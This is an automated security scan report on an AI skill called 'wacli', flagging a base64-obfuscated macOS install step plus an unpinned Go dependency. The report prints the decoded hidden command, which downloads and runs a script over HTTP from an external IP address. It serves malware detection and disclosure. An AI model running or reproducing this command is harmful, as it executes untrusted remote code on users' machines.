Trust Assessment
wacli received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated Command Injection via Base64-encoded Script Download, Unpinned Go Module Dependency.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/wacli-hq4/SKILL.md:10 | |
| CRITICAL | Obfuscated Command Injection via Base64-encoded Script Download The MacOS installation instructions include a command that decodes a base64 string and pipes its output directly to `bash`. The decoded string is `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from an unencrypted HTTP connection to an external IP address (`http://91.92.242.30`). This allows for the execution of any code on the user's system, bypassing security checks and potentially leading to full system compromise, data exfiltration, or installation of malware. The use of base64 obfuscates the malicious intent, making it a hidden instruction. Immediately remove the malicious MacOS installation command. If a setup wizard or tool installation is genuinely required, provide a direct, transparent, and secure (HTTPS) download link or a signed package, and avoid piping arbitrary downloaded scripts directly to `bash`. | LLM | SKILL.md:9 | |
| HIGH | Unpinned Go Module Dependency The `wacli` skill's manifest specifies the Go module `github.com/steipete/wacli/cmd/wacli@latest`. Using `@latest` means that the dependency is not pinned to a specific version or commit hash. This introduces a supply chain risk, as a malicious update to the `wacli` repository could be automatically pulled in and executed without explicit review, potentially compromising the system or skill. Pin the Go module dependency to a specific version or commit hash (e.g., `github.com/steipete/wacli/cmd/wacli@v1.2.3` or `@<commit_hash>`) to ensure deterministic builds and prevent unexpected or malicious updates. | LLM | Manifest |
Scan History
Embed Code
[](https://skillshield.io/report/a6083bc6c2ec7ea6)
Powered by SkillShield